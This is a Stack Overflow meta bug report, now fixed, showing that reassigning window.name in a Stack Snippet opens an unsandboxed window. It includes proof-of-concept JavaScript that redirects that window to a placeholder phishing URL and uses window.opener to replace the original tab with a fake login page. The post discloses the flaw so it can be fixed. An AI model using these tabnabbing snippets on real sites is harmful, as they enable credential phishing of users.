# Reassigning window.name inside a Stack Snippet results in unexpected popup

Tags: bug, status-completed, stack-snippets, security

Run the following snippet twice (either in the post proper, or in the snippet editor). On subsequent runs, rather than the form posting to the embedded result iframe, a new window is opened:

```js
console.log('Original window name:', window.name);
window.name = 'foo';
/*
Acquire an unsandboxed, top-level tab/window on the browsers of other SO users:
if (window.parent === window) {
  window.location.href = 'https://disguised-phishing-or-malware-or-advertisement';
}
*/
```

The browser uses the `target` of a submitted form to determine where the response is displayed: it tries to find an iframe with a matching `name`, eg:

```html
<form target="iframename">
  <textarea name="foo">valueToProcess</textarea>
</form>
<iframe name="iframename"></iframe>
```

But when the iframe sets its `window.name` internally, subsequent submissions from the parent window no longer recognize the iframe as a valid target, so a new window opens instead.

Accidentally reassigning `window.name` is a [relatively common problem](https://stackoverflow.com/questions/linked/10523701?lq=1). The content of a Stack Snippet should not have an effect outside of the iframe. I'm a bit doubtful if there's a method to get the existing cross-origin iframe to be recognized again from Javascript inside the parent window - maybe there is, but I didn't find one after playing around a bit. In addition, messing with the child window (so as to prevent `window.name` reassignment) is a bit undesirable. But, a theoretically simple workaround would be to create *another* iframe (a new [`_boxResult`](https://dev.stackoverflow.com/content//Js/full.en.js)) on each submission, discarding the possibly-broken old one.

Just as a proof-of-concept, before pressing "Run code snippet" again, if you open your browser console and paste in the following code:

```
document.querySelector('iframe').outerHTML += '';
```

you'll see that the response remains in the iframe as it should be.

An answer that's currently deleted (thanks [Toronto Raptors](https://meta.stackoverflow.com/users/1114/toronto-raptors)) shows that you can also change the *original* page via `window.opener`, which may have even more potential for abuse:

```js
window.name = 'something else';
if (window.parent !== window) {
  console.error("Run me again!");
} else {
  // Load my evil fake Stack Exchange login screen
  window.opener.location = 'https://liveweb.archive.org/https://stackoverflow.com/users/login';
  
  setTimeout(() => {
    console.log('Working...');
  }, 3000);
  
  // Give the replaced page time to load
  setTimeout(() => {
    console.log('Go back and try to answer my question');
  
    // When the user closes the new opened window themselves,
    // they have no reason to suspect that the old SO window is now untrustworthy
  }, 6000);
}
```

Comment: Wow. That's... really unsafe.

Comment: @window.document The question does say that a fix is to replace the iframe, that is, the `_boxResult`s [here](https://dev.stackoverflow.com/content//Js/full.en.js), every time the snippet is run again. Inside the `function SnippetEditor`, the persistent `_boxResult` is only used for a UUID to read and post to - maybe have just the UUID be persistent instead, then right before the two calls of `form.submit();`, replace the `#snpte-box-edit-result` iframe.

Comment: The in-post snippet (`function Snippet`) really does need the current iframe to be persistent for `hide` to work. Maybe change the `if (!_boxResult) { _boxResult = makeIFrame(); _results.append(_boxResult); }` to an unconditional replacement and reassignment of the previous `_boxResult`

Comment: One way would be to drop IE support and [make it all on the front-end](https://jsfiddle.net/mdb4koLe/1/). (and if non chromium Edge is not needed, then it can even be made [more cleanly](https://jsfiddle.net/mdb4koLe/).)

Answer (score 4, accepted):

This has been fixed in the latest deploy.

As suggested in comments, the fix was to not reuse the `_boxResult` element which has been tainted by previously run user-provided code.

Answer (score 0):

Cool find! From from the unsandboxed new window you can also replace the original parent window through `window.opener`.

```js
window.name = 'something else';
if (window.parent !== window) {
  console.error("Run me again!");
} else {
  // Load my evil fake Stack Exchange login screen.
  window.opener.location = 'https://liveweb.archive.org/https://stackoverflow.com/users/login';
  window.close();
}
```